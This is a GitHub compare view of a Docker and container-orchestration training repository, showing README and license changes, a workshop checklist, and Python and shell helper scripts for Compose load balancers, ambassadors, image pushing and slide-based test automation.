Compare commits

..

4 Commits

Author SHA1 Message Date
Jérôme Petazzoni
58e76b81f2 Fixing missing stack name 2017-06-12 17:41:55 +02:00
Jérôme Petazzoni
a1adc2292f Merge pull request #81 from soulshake/devopscon-compose-version
Fix docker-compose version
2017-06-11 23:01:33 +02:00
AJ Bowen
8d6421ddea Fix docker-compose version 2017-06-11 23:00:22 +02:00
Jérôme Petazzoni
63b6db4843 First round of updates for devopscon 2017-06-10 21:40:05 +02:00
470 changed files with 10159 additions and 75947 deletions

22
.gitignore vendored
View File

@@ -1,22 +1,8 @@
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
prepare-vms/infra
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
node_modules
### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride
### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

View File

@@ -1,24 +0,0 @@
Checklist to use when delivering a workshop
Authored by Jérôme; additions by Bridget
- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
- [ ] Push local branch to GitHub and merge into main repo
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] Update the slides that says which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
- [ ] Update the version of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
- [ ] (optional) Create chatroom
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] How many VMs do we need? Check with event organizers ahead of time
- [ ] Provision VMs (slightly more than we think we'll need)
- [ ] Change password on presenter's VMs (to forestall any hijinx)
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
- [ ] Print cards
- [ ] Cut cards
- [ ] Last-minute merge from master
- [ ] Check that all looks good
- [ ] DELIVER!
- [ ] Shut down VMs
- [ ] Update index.html to remove chat link and move session to past things

19
LICENSE
View File

@@ -1,12 +1,13 @@
The code in this repository is licensed under the Apache License
Version 2.0. You may obtain a copy of this license at:
Copyright 2015 Jérôme Petazzoni
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
The instructions and slides in this repository (e.g. the files
with extension .md and .yml in the "slides" subdirectory) are
under the Creative Commons Attribution 4.0 International Public
License. You may obtain a copy of this license at:
https://creativecommons.org/licenses/by/4.0/legalcode
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

297
README.md
View File

@@ -1,134 +1,137 @@
# Container Training
# Docker Orchestration Workshop
This repository (formerly known as `orchestration-workshop`)
contains materials (slides, scripts, demo app, and other
code samples) used for various workshops, tutorials, and
training sessions around the themes of Docker, containers,
and orchestration.
For the moment, it includes:
- Introduction to Docker and Containers,
- Container Orchestration with Docker Swarm,
- Container Orchestration with Kubernetes.
These materials have been designed around the following
principles:
- they assume very little prior knowledge of Docker,
containers, or a particular programming language;
- they can be used in a classroom setup (with an
instructor), or self-paced at home;
- they are hands-on, meaning that they contain lots
of examples and exercises that you can easily
reproduce;
- they progressively introduce concepts in chapters
that build on top of each other.
If you're looking for the materials, you can stop reading
right now, and hop to http://container.training/, which
hosts all the slides decks available.
The rest of this document explains how this repository
is structured, and how to use it to deliver (or create)
your own tutorials.
This is the material (slides, scripts, demo app, and other
code samples) for the "Docker orchestration workshop"
written and delivered by Jérôme Petazzoni (and lots of others)
non-stop since June 2015.
## Why a single repository?
## Content
All these materials have been gathered in a single repository
because they have a few things in common:
- some [common slides](slides/common/) that are re-used
(and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
Markdown source files;
- a [semi-automated test harness](slides/autopilot/) to check
that the exercises and examples provided work properly;
- a [PhantomJS script](slides/slidechecker.js) to check
that the slides look good and don't have formatting issues;
- [deployment scripts](prepare-vms/) to start training
VMs in bulk;
- a fancy pipeline powered by
[Netlify](https://www.netlify.com/) and continuously
deploying `master` to http://container.training/.
- Chapter 1: Getting Started: running apps with docker-compose
- Chapter 2: Scaling out with Swarm Mode
- Chapter 3: Operating the Swarm (networks, updates, logging, metrics)
- Chapter 4: Deeper in Swarm (stateful services, scripting, DAB's)
## What are the different courses available?
## Quick start (or, "I want to try it!")
**Introduction to Docker** is derived from the first
"Docker Fundamentals" training materials. For more information,
see [jpetazzo/intro-to-docker](https://github.com/jpetazzo/intro-to-docker).
The version in this repository has been adapted to the Markdown
publishing pipeline. It is still maintained, but only receives
minor updates once in a while.
This workshop is designed to be *hands on*, i.e. to give you a step-by-step
guide where you will build your own Docker cluster, and use it to deploy
a sample application.
**Container Orchestration with Docker Swarm** (formerly
known as "Orchestration Workshop") is a workshop created by Jérôme
Petazzoni in June 2015. Since then, it has been continuously updated
and improved, and received contributions from many others authors.
It is actively maintained.
The easiest way to follow the workshop is to attend it when it is delivered
by an instructor. In that case, the instructor will generally give you
credentials (IP addresses, login, password) to connect to your own cluster
of virtual machines; and the [slides](http://jpetazzo.github.io/orchestration-workshop)
assume that you have your own cluster indeed.
**Container Orchestration with Kubernetes** was created by
Jérôme Petazzoni in October 2017, with help and feedback from
a few other contributors. It is actively maintained.
If you want to follow the workshop on your own, and want to have your
own cluster, we have multiple solutions for you!
## Repository structure
### Using [play-with-docker](http://play-with-docker.com/)
- [bin](bin/)
- A few helper scripts that you can safely ignore for now.
- [dockercoins](dockercoins/)
- The demo app used throughout the orchestration workshops.
- [efk](efk/), [elk](elk/), [prom](prom/), [snap](snap/):
- Logging and metrics stacks used in the later parts of
the orchestration workshops.
- [prepare-local](prepare-local/), [prepare-machine](prepare-machine/):
- Contributed scripts to automate the creation of local environments.
These could use some help to test/check that they work.
- [prepare-vms](prepare-vms/):
- Scripts to automate the creation of AWS instances for students.
These are routinely used and actively maintained.
- [slides](slides/):
- All the slides! They are assembled from Markdown files with
a custom Python script, and then rendered using [gnab/remark](
https://github.com/gnab/remark). Check this directory for more details.
- [stacks](stacks/):
- A handful of Compose files (version 3) allowing to easily
deploy complex application stacks.
This method is very easy to get started (you don't need any extra account
or resources!) but will require a bit of adaptation from the workshop slides.
To get started, go to [play-with-docker](http://play-with-docker.com/), and
click on _ADD NEW INSTANCE_ five times. You will get five "docker-in-docker"
containers, all on a private network. These are your five nodes for the workshop!
When the instructions in the slides tell you to "SSH on node X", just go to
the tab corresponding to that node.
The nodes are not directly reachable from outside; so when the slides tell
you to "connect to the IP address of your node on port XYZ" you will have
to use a different method.
We suggest to use "supergrok", a container offering a NGINX+ngrok combo to
expose your services. To use it, just start (on any of your nodes) the
`jpetazzo/supergrok` image. The image will output further instructions:
```
docker run --name supergrok -d jpetazzo/supergrok
docker logs --follow supergrok
```
The logs of the container will give you a tunnel address and explain you
how to connected to exposed services. That's all you need to do!
We are also working on a native proxy, embedded to Play-With-Docker.
Stay tuned!
<!--
- You can use a proxy provided by Play-With-Docker. When the slides
instruct you to connect to nodeX on port ABC, instead, you will connect
to http://play-with-docker.com/XXX.XXX.XXX.XXX:ABC, where XXX.XXX.XXX.XXX
is the IP address of nodeX.
-->
Note that the instances provided by Play-With-Docker have a short lifespan
(a few hours only), so if you want to do the workshop over multiple sessions,
you will have to start over each time ... Or create your own cluster with
one of the methods described below.
## Course structure
### Using Docker Machine to create your own cluster
(This applies only for the orchestration workshops.)
This method requires a bit more work to get started, but you get a permanent
cluster, with less limitations.
The workshop introduces a demo app, "DockerCoins," built
around a micro-services architecture. First, we run it
on a single node, using Docker Compose. Then, we pretend
that we need to scale it, and we use an orchestrator
(SwarmKit or Kubernetes) to deploy and scale the app on
a cluster.
You will need Docker Machine (if you have Docker Mac, Docker Windows, or
the Docker Toolbox, you're all set already). You will also need:
We explain the concepts of the orchestrator. For SwarmKit,
we setup the cluster with `docker swarm init` and `docker swarm join`.
For Kubernetes, we use pre-configured clusters.
- credentials for a cloud provider (e.g. API keys or tokens),
- or a local install of VirtualBox or VMware (or anything supported
by Docker Machine).
Then, we cover more advanced concepts: scaling, load balancing,
updates, global services or daemon sets.
There are a number of advanced optional chapters about
logging, metrics, secrets, network encryption, etc.
The content is very modular: it is broken down in a large
number of Markdown files, that are put together according
to a YAML manifest. This allows to re-use content
between different workshops very easily.
Full instructions are in the [prepare-machine](prepare-machine) subdirectory.
### DockerCoins
### Using our scripts to mass-create a bunch of clusters
The sample app is in the `dockercoins` directory.
It's used during all chapters
Since we often deliver the workshop during conferences or similar events,
we have scripts to automate the creation of a bunch of clusters using
AWS EC2. If you want to create multiple clusters and have EC2 credits,
check the [prepare-vms](prepare-vms) directory for more information.
## How This Repo is Organized
- **dockercoins**
- Sample App: compose files and source code for the dockercoins sample apps
used throughout the workshop
- **docs**
- Slide Deck: presentation slide deck, works out-of-box with GitHub Pages,
uses https://remarkjs.com
- **prepare-local**
- untested scripts for automating the creation of local virtualbox VM's
(could use your help validating)
- **prepare-machine**
- instructions explaining how to use Docker Machine to create VMs
- **prepare-vms**
- scripts for automating the creation of AWS instances for students
## Slide Deck
- The slides are in the `docs` directory.
- To view them locally open `docs/index.html` in your browser. It works
offline too.
- To view them online open https://jpetazzo.github.io/orchestration-workshop/
in your browser.
- When you fork this repo, be sure GitHub Pages is enabled in repo Settings
for "master branch /docs folder" and you'll have your own website for them.
- They use https://remarkjs.com to allow simple markdown in a html file that
remark will transform into a presentation in the browser.
## Sample App: Dockercoins!
The sample app is in the `dockercoins` directory. It's used during all chapters
for explaining different concepts of orchestration.
To see it in action:
@@ -138,18 +141,13 @@ To see it in action:
- the web UI will be available on port 8000
*If you just want to run the workshop for yourself, you can stop reading
here. If you want to deliver the workshop for others (i.e. if you
want to become an instructor), keep reading!*
## Running the Workshop
If you want to deliver one of these workshops yourself,
this section is for you!
> *This section has been mostly contributed by
> [Bret Fisher](https://twitter.com/bretfisher), who was
> one of the first persons to have the bravery of delivering
> this workshop without me. Thanks Bret! 🍻
>
> Jérôme.*
### General timeline of planning a workshop
@@ -157,7 +155,7 @@ this section is for you!
understand the different `dockercoins` repo's and the steps we go through to
get to a full Swarm Mode cluster of many containers. You'll update the first
few slides and last slide at a minimum, with your info.
- ~~Your docs directory can use GitHub Pages.~~
- Your docs directory can use GitHub Pages.
- This workshop expects 5 servers per student. You can get away with as little
as 2 servers per student, but you'll need to change the slide deck to
accommodate. More servers = more fun.
@@ -183,14 +181,13 @@ this section is for you!
they need for class.
- Typically you create the servers the day before or morning of workshop, and
leave them up the rest of day after workshop. If creating hundreds of servers,
you'll likely want to run all these `workshopctl` commands from a dedicated
you'll likely want to run all these `trainer` commands from a dedicated
instance you have in same region as instances you want to create. Much faster
this way if you're on poor internet. Also, create 2 sets of servers for
yourself, and use one during workshop and the 2nd is a backup.
- Remember you'll need to print the "cards" for students, so you'll need to
create instances while you have a way to print them.
### Things That Could Go Wrong
- Creating AWS instances ahead of time, and you hit its limits in region and
@@ -199,20 +196,18 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!
### Creating the VMs
`prepare-vms/workshopctl` is the script that gets you most of what you need for
`prepare-vms/trainer` is the script that gets you most of what you need for
setting up instances. See
[prepare-vms/README.md](prepare-vms)
for all the info on tools and scripts.
### Content for Different Workshop Durations
With all the slides, this workshop is a full day long. If you need to deliver
@@ -221,7 +216,6 @@ can replace `---` with `???` which will hide slides. Or leave them there and
add something like `(EXTRA CREDIT)` to title so students can still view the
content but you also know to skip during presentation.
#### 3 Hour Version
- Limit time on debug tools, maybe skip a few. *"Chapter 1:
@@ -233,7 +227,6 @@ content but you also know to skip during presentation.
- Mention what DAB's are, but make this part optional in case you run out
of time
#### 2 Hour Version
- Skip all the above, and:
@@ -247,17 +240,6 @@ content but you also know to skip during presentation.
- Last 15-30 minutes is for stateful services, DAB files, and questions.
### Pre-built images
There are pre-built images for the 4 components of the DockerCoins demo app: `dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`, and `dockercoins/worker:v0.1`. They correspond to the code in this repository.
There are also three variants, for demo purposes:
- `dockercoins/rng:v0.2` is broken (the server won't even start),
- `dockercoins/webui:v0.2` has bigger font on the Y axis and a green graph (instead of blue),
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
## Past events
Since its inception, this workshop has been delivered dozens of times,
@@ -289,34 +271,13 @@ If there is a bug and you can't fix it, but you can
reproduce it: submit an issue explaining how to reproduce.
If there is a bug and you can't even reproduce it:
sorry. It is probably an Heisenbug. We can't act on it
until it's reproducible, alas.
sorry. It is probably an Heisenbug. I can't act on it
until it's reproducible.
if you have attended this workshop and have feedback,
or if you want us to deliver that workshop at your
conference or for your company: contact me (jerome
at docker dot com).
# “Please teach us!”
If you have attended one of these workshops, and want
your team or organization to attend a similar one, you
can look at the list of upcoming events on
http://container.training/.
You are also welcome to reuse these materials to run
your own workshop, for your team or even at a meetup
or conference. In that case, you might enjoy watching
[Bridget Kromhout's talk at KubeCon 2018 Europe](
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
precisely how to run such a workshop yourself.
Finally, you can also contact the following persons,
who are experienced speakers, are familiar with the
material, and are available to deliver these workshops
at your conference or for your company:
- jerome dot petazzoni at gmail dot com
- bret at bretfisher dot com
(If you are willing and able to deliver such workshops,
feel free to submit a PR to add your name to that list!)
**Thank you!**
Thank you!

191
autotest/autotest.py Executable file
View File

@@ -0,0 +1,191 @@
#!/usr/bin/env python
import os
import re
import signal
import subprocess
import time
def print_snippet(snippet):
print(78*'-')
print(snippet)
print(78*'-')
class Snippet(object):
def __init__(self, slide, content):
self.slide = slide
self.content = content
self.actions = []
def __str__(self):
return self.content
class Slide(object):
current_slide = 0
def __init__(self, content):
Slide.current_slide += 1
self.number = Slide.current_slide
# Remove commented-out slides
# (remark.js considers ??? to be the separator for speaker notes)
content = re.split("\n\?\?\?\n", content)[0]
self.content = content
self.snippets = []
exercises = re.findall("\.exercise\[(.*)\]", content, re.DOTALL)
for exercise in exercises:
if "```" in exercise and "<br/>`" in exercise:
print("! Exercise on slide {} has both ``` and <br/>` delimiters, skipping."
.format(self.number))
print_snippet(exercise)
elif "```" in exercise:
for snippet in exercise.split("```")[1::2]:
self.snippets.append(Snippet(self, snippet))
elif "<br/>`" in exercise:
for snippet in re.findall("<br/>`(.*)`", exercise):
self.snippets.append(Snippet(self, snippet))
else:
print(" Exercise on slide {} has neither ``` or <br/>` delimiters, skipping."
.format(self.number))
def __str__(self):
text = self.content
for snippet in self.snippets:
text = text.replace(snippet.content, ansi("7")(snippet.content))
return text
def ansi(code):
return lambda s: "\x1b[{}m{}\x1b[0m".format(code, s)
slides = []
with open("index.html") as f:
content = f.read()
for slide in re.split("\n---?\n", content):
slides.append(Slide(slide))
is_editing_file = False
placeholders = {}
for slide in slides:
for snippet in slide.snippets:
content = snippet.content
# Multi-line snippets should be ```highlightsyntax...
# Single-line snippets will be interpreted as shell commands
if '\n' in content:
highlight, content = content.split('\n', 1)
else:
highlight = "bash"
content = content.strip()
# If the previous snippet was a file fragment, and the current
# snippet is not YAML or EDIT, complain.
if is_editing_file and highlight not in ["yaml", "edit"]:
print("! On slide {}, previous snippet was YAML, so what do what do?"
.format(slide.number))
print_snippet(content)
is_editing_file = False
if highlight == "yaml":
is_editing_file = True
elif highlight == "placeholder":
for line in content.split('\n'):
variable, value = line.split(' ', 1)
placeholders[variable] = value
elif highlight == "bash":
for variable, value in placeholders.items():
quoted = "`{}`".format(variable)
if quoted in content:
content = content.replace(quoted, value)
del placeholders[variable]
if '`' in content:
print("! The following snippet on slide {} contains a backtick:"
.format(slide.number))
print_snippet(content)
continue
print("_ "+content)
snippet.actions.append((highlight, content))
elif highlight == "edit":
print(". "+content)
snippet.actions.append((highlight, content))
elif highlight == "meta":
print("^ "+content)
snippet.actions.append((highlight, content))
else:
print("! Unknown highlight {!r} on slide {}.".format(highlight, slide.number))
if placeholders:
print("! Remaining placeholder values: {}".format(placeholders))
actions = sum([snippet.actions for snippet in sum([slide.snippets for slide in slides], [])], [])
# Strip ^{ ... ^} for now
def strip_curly_braces(actions, in_braces=False):
if actions == []:
return []
elif actions[0] == ("meta", "^{"):
return strip_curly_braces(actions[1:], True)
elif actions[0] == ("meta", "^}"):
return strip_curly_braces(actions[1:], False)
elif in_braces:
return strip_curly_braces(actions[1:], True)
else:
return [actions[0]] + strip_curly_braces(actions[1:], False)
actions = strip_curly_braces(actions)
background = []
cwd = os.path.expanduser("~")
env = {}
for current_action, next_action in zip(actions, actions[1:]+[("bash", "true")]):
if current_action[0] == "meta":
continue
print(ansi(7)(">>> {}".format(current_action[1])))
time.sleep(1)
popen_options = dict(shell=True, cwd=cwd, stdin=subprocess.PIPE, preexec_fn=os.setpgrp)
# The follow hack allows to capture the environment variables set by `docker-machine env`
# FIXME: this doesn't handle `unset` for now
if any([
"eval $(docker-machine env" in current_action[1],
"DOCKER_HOST" in current_action[1],
"COMPOSE_FILE" in current_action[1],
]):
popen_options["stdout"] = subprocess.PIPE
current_action[1] += "\nenv"
proc = subprocess.Popen(current_action[1], **popen_options)
proc.cmd = current_action[1]
if next_action[0] == "meta":
print(">>> {}".format(next_action[1]))
time.sleep(3)
if next_action[1] == "^C":
os.killpg(proc.pid, signal.SIGINT)
proc.wait()
elif next_action[1] == "^Z":
# Let the process run
background.append(proc)
elif next_action[1] == "^D":
proc.communicate()
proc.wait()
else:
print("! Unknown meta action {} after snippet:".format(next_action[1]))
print_snippet(next_action[1])
print(ansi(7)("<<< {}".format(current_action[1])))
else:
proc.wait()
if "stdout" in popen_options:
stdout, stderr = proc.communicate()
for line in stdout.split('\n'):
if line.startswith("DOCKER_"):
variable, value = line.split('=', 1)
env[variable] = value
print("=== {}={}".format(variable, value))
print(ansi(7)("<<< {} >>> {}".format(proc.returncode, current_action[1])))
if proc.returncode != 0:
print("Got non-zero status code; aborting.")
break
if current_action[1].startswith("cd "):
cwd = os.path.expanduser(current_action[1][3:])
for proc in background:
print("Terminating background process:")
print_snippet(proc.cmd)
proc.terminate()
proc.wait()

1
autotest/index.html Symbolic link
View File

@@ -0,0 +1 @@
../www/htdocs/index.html

42
bin/add-load-balancer-v1.py Executable file
View File

@@ -0,0 +1,42 @@
#!/usr/bin/env python
import os
import sys
import yaml
# arg 1 = service name
# arg 2 = number of instances
service_name = sys.argv[1]
desired_instances = int(sys.argv[2])
compose_file = os.environ["COMPOSE_FILE"]
input_file, output_file = compose_file, compose_file
config = yaml.load(open(input_file))
# The ambassadors need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))
port = str(ports[service_name])
command_line = port
depends_on = []
for n in range(1, 1+desired_instances):
config["services"]["{}{}".format(service_name, n)] = config["services"][service_name]
command_line += " {}{}:{}".format(service_name, n, port)
depends_on.append("{}{}".format(service_name, n))
config["services"][service_name] = {
"image": "jpetazzo/hamba",
"command": command_line,
"depends_on": depends_on,
}
if "networks" in config["services"]["{}1".format(service_name)]:
config["services"][service_name]["networks"] = config["services"]["{}1".format(service_name)]["networks"]
yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)

87
bin/add-load-balancer-v2.py Executable file
View File

@@ -0,0 +1,87 @@
#!/usr/bin/env python
import os
import sys
import yaml
def error(msg):
print("ERROR: {}".format(msg))
exit(1)
# arg 1 = service name
service_name = sys.argv[1]
compose_file = os.environ["COMPOSE_FILE"]
input_file, output_file = compose_file, compose_file
config = yaml.load(open(input_file))
version = config.get("version")
if version != "2":
error("Unsupported $COMPOSE_FILE version: {!r}".format(version))
# The load balancers need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))
port = str(ports[service_name])
if service_name not in config["services"]:
error("service {} not found in $COMPOSE_FILE"
.format(service_name))
lb_name = "{}-lb".format(service_name)
be_name = "{}-be".format(service_name)
wd_name = "{}-wd".format(service_name)
if lb_name in config["services"]:
error("load balancer {} already exists in $COMPOSE_FILE"
.format(lb_name))
if wd_name in config["services"]:
error("dns watcher {} already exists in $COMPOSE_FILE"
.format(wd_name))
service = config["services"][service_name]
if "networks" in service:
error("service {} has custom networks"
.format(service_name))
# Put the service on its own network.
service["networks"] = {service_name: {"aliases": [ be_name ] } }
# Put a label indicating which load balancer is responsible for this service.
if "labels" not in service:
service["labels"] = {}
service["labels"]["loadbalancer"] = lb_name
# Add the load balancer.
config["services"][lb_name] = {
"image": "jpetazzo/hamba",
"command": "{} {} {}".format(port, be_name, port),
"depends_on": [ service_name ],
"networks": {
"default": {
"aliases": [ service_name ],
},
service_name: None,
},
}
# Add the DNS watcher.
config["services"][wd_name] = {
"image": "jpetazzo/watchdns",
"command": "{} {} {}".format(port, be_name, port),
"volumes_from": [ lb_name ],
"networks": {
service_name: None,
},
}
if "networks" not in config:
config["networks"] = {}
if service_name not in config["networks"]:
config["networks"][service_name] = None
yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)

63
bin/build-tag-push.py Executable file
View File

@@ -0,0 +1,63 @@
#!/usr/bin/env python
from common import ComposeFile
import os
import subprocess
import time
registry = os.environ.get("DOCKER_REGISTRY")
if not registry:
print("Please set the DOCKER_REGISTRY variable, e.g.:")
print("export DOCKER_REGISTRY=jpetazzo # use the Docker Hub")
print("export DOCKER_REGISTRY=localhost:5000 # use a local registry")
exit(1)
# Get the name of the current directory.
project_name = os.path.basename(os.path.realpath("."))
# Version used to tag the generated Docker image, using the UNIX timestamp or the given version.
if "VERSION" not in os.environ:
version = str(int(time.time()))
else:
version = os.environ["VERSION"]
# Execute "docker-compose build" and abort if it fails.
subprocess.check_call(["docker-compose", "-f", "docker-compose.yml", "build"])
# Load the services from the input docker-compose.yml file.
# TODO: run parallel builds.
compose_file = ComposeFile("docker-compose.yml")
# Iterate over all services that have a "build" definition.
# Tag them, and initiate a push in the background.
push_operations = dict()
for service_name, service in compose_file.services.items():
if "build" in service:
compose_image = "{}_{}".format(project_name, service_name)
registry_image = "{}/{}:{}".format(registry, compose_image, version)
# Re-tag the image so that it can be uploaded to the registry.
subprocess.check_call(["docker", "tag", compose_image, registry_image])
# Spawn "docker push" to upload the image.
push_operations[service_name] = subprocess.Popen(["docker", "push", registry_image])
# Replace the "build" definition by an "image" definition,
# using the name of the image on the registry.
del service["build"]
service["image"] = registry_image
# Wait for push operations to complete.
for service_name, popen_object in push_operations.items():
print("Waiting for {} push to complete...".format(service_name))
popen_object.wait()
print("Done.")
# Write the new docker-compose.yml file.
if "COMPOSE_FILE" not in os.environ:
os.environ["COMPOSE_FILE"] = "docker-compose.yml-{}".format(version)
print("Writing to new Compose file:")
else:
print("Writing to provided Compose file:")
print("COMPOSE_FILE={}".format(os.environ["COMPOSE_FILE"]))
compose_file.save()

76
bin/common.py Executable file
View File

@@ -0,0 +1,76 @@
import os
import subprocess
import sys
import time
import yaml
def COMPOSE_FILE():
if "COMPOSE_FILE" not in os.environ:
print("The $COMPOSE_FILE environment variable is not set. Aborting.")
exit(1)
return os.environ["COMPOSE_FILE"]
class ComposeFile(object):
def __init__(self, filename=None):
if filename is None:
filename = COMPOSE_FILE()
if not os.path.isfile(filename):
print("File {!r} does not exist. Aborting.".format(filename))
exit(1)
self.data = yaml.load(open(filename))
@property
def services(self):
if self.data.get("version") == "2":
return self.data["services"]
else:
return self.data
def save(self, filename=None):
if filename is None:
filename = COMPOSE_FILE()
with open(filename, "w") as f:
yaml.safe_dump(self.data, f, default_flow_style=False)
# Executes a bunch of commands in parallel, but no more than N at a time.
# This allows to execute concurrently a large number of tasks, without
# turning into a fork bomb.
# `parallelism` is the number of tasks to execute simultaneously.
# `commands` is a list of tasks to execute.
# Each task is itself a list, where the first element is a descriptive
# string, and the folloowing elements are the arguments to pass to Popen.
def parallel_run(commands, parallelism):
running = []
# While stuff is running, or we have stuff to run...
while commands or running:
# While there is stuff to run, and room in the pipe...
while commands and len(running)<parallelism:
command = commands.pop(0)
print("START {}".format(command[0]))
popen = subprocess.Popen(
command[1:], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
popen._desc = command[0]
running.append(popen)
must_sleep = True
for popen in running:
status = popen.poll()
if status is not None:
must_sleep = False
running.remove(popen)
if status==0:
print("OK {}".format(popen._desc))
else:
print("ERROR {} [Exit status: {}]"
.format(popen._desc, status))
output = "\n" + popen.communicate()[0].strip()
output = output.replace("\n", "\n| ")
print(output)
else:
print("WAIT ({} running, {} more to run)"
.format(len(running), len(commands)))
if must_sleep:
time.sleep(1)

69
bin/configure-ambassadors.py Executable file
View File

@@ -0,0 +1,69 @@
#!/usr/bin/env python
from common import parallel_run
import os
import subprocess
project_name = os.path.basename(os.path.realpath("."))
# Get all services and backends in our compose application.
containers_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=com.docker.compose.project={}".format(project_name),
"--format", '{{ .ID }} '
'{{ .Label "com.docker.compose.service" }} '
'{{ .Ports }}',
])
# Build list of backends.
frontend_ports = dict()
backends = dict()
for container in containers_data.split('\n'):
if not container:
continue
# TODO: support services with multiple ports!
container_id, service_name, port = container.split(' ')
if not port:
continue
backend, frontend = port.split("->")
backend_addr, backend_port = backend.split(':')
frontend_port, frontend_proto = frontend.split('/')
# TODO: deal with udp (mostly skip it?)
assert frontend_proto == "tcp"
# TODO: check inconsistencies between port mappings
frontend_ports[service_name] = frontend_port
if service_name not in backends:
backends[service_name] = []
backends[service_name].append((backend_addr, backend_port))
# Get all existing ambassadors for this application.
ambassadors_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=ambassador.project={}".format(project_name),
"--format", '{{ .ID }} '
'{{ .Label "ambassador.service" }} '
'{{ .Label "ambassador.bindaddr" }}',
])
# Update ambassadors.
operations = []
for ambassador in ambassadors_data.split('\n'):
if not ambassador:
continue
ambassador_id, service_name, bind_address = ambassador.split()
print("Updating configuration for {}/{} -> {}:{} -> {}"
.format(service_name, ambassador_id,
bind_address, frontend_ports[service_name],
backends[service_name]))
command = [
ambassador_id,
"docker", "run", "--rm", "--volumes-from", ambassador_id,
"jpetazzo/hamba", "reconfigure",
"{}:{}".format(bind_address, frontend_ports[service_name])
]
for backend_addr, backend_port in backends[service_name]:
command.extend([backend_addr, backend_port])
operations.append(command)
# Execute all commands in parallel.
parallel_run(operations, 10)

71
bin/create-ambassadors.py Executable file
View File

@@ -0,0 +1,71 @@
#!/usr/bin/env python
from common import ComposeFile, parallel_run
import os
import subprocess
config = ComposeFile()
project_name = os.path.basename(os.path.realpath("."))
# Get all services in our compose application.
containers_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=com.docker.compose.project={}".format(project_name),
"--format", '{{ .ID }} {{ .Label "com.docker.compose.service" }}',
])
# Get all existing ambassadors for this application.
ambassadors_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=ambassador.project={}".format(project_name),
"--format", '{{ .ID }} '
'{{ .Label "ambassador.container" }} '
'{{ .Label "ambassador.service" }}',
])
# Build a set of existing ambassadors.
ambassadors = dict()
for ambassador in ambassadors_data.split('\n'):
if not ambassador:
continue
ambassador_id, container_id, linked_service = ambassador.split()
ambassadors[container_id, linked_service] = ambassador_id
operations = []
# Start the missing ambassadors.
for container in containers_data.split('\n'):
if not container:
continue
container_id, service_name = container.split()
extra_hosts = config.services[service_name].get("extra_hosts", {})
for linked_service, bind_address in extra_hosts.items():
description = "Ambassador {}/{}/{}".format(
service_name, container_id, linked_service)
ambassador_id = ambassadors.pop((container_id, linked_service), None)
if ambassador_id:
print("{} already exists: {}".format(description, ambassador_id))
else:
print("{} not found, creating it.".format(description))
operations.append([
description,
"docker", "run", "-d",
"--net", "container:{}".format(container_id),
"--label", "ambassador.project={}".format(project_name),
"--label", "ambassador.container={}".format(container_id),
"--label", "ambassador.service={}".format(linked_service),
"--label", "ambassador.bindaddr={}".format(bind_address),
"jpetazzo/hamba", "run"
])
# Destroy extraneous ambassadors.
for ambassador_id in ambassadors.values():
print("{} is not useful anymore, destroying it.".format(ambassador_id))
operations.append([
"rm -f {}".format(ambassador_id),
"docker", "rm", "-f", ambassador_id,
])
# Execute all commands in parallel.
parallel_run(operations, 10)

3
bin/delete-ambassadors.sh Executable file
View File

@@ -0,0 +1,3 @@
#!/bin/sh
docker ps -q --filter label=ambassador.project=dockercoins |
xargs docker rm -f

16
bin/fixup-yaml.sh Executable file
View File

@@ -0,0 +1,16 @@
#!/bin/sh
# Some tools will choke on the YAML files generated by PyYAML;
# in particular on a section like this one:
#
# service:
# ports:
# - 8000:5000
#
# This script adds two spaces in front of the dash in those files.
# Warning: it is a hack, and probably won't work on some YAML files.
[ -f "$COMPOSE_FILE" ] || {
echo "Cannot find COMPOSE_FILE"
exit 1
}
sed -i 's/^ -/ -/' $COMPOSE_FILE

38
bin/link-to-ambassadors.py Executable file
View File

@@ -0,0 +1,38 @@
#!/usr/bin/env python
from common import ComposeFile
import yaml
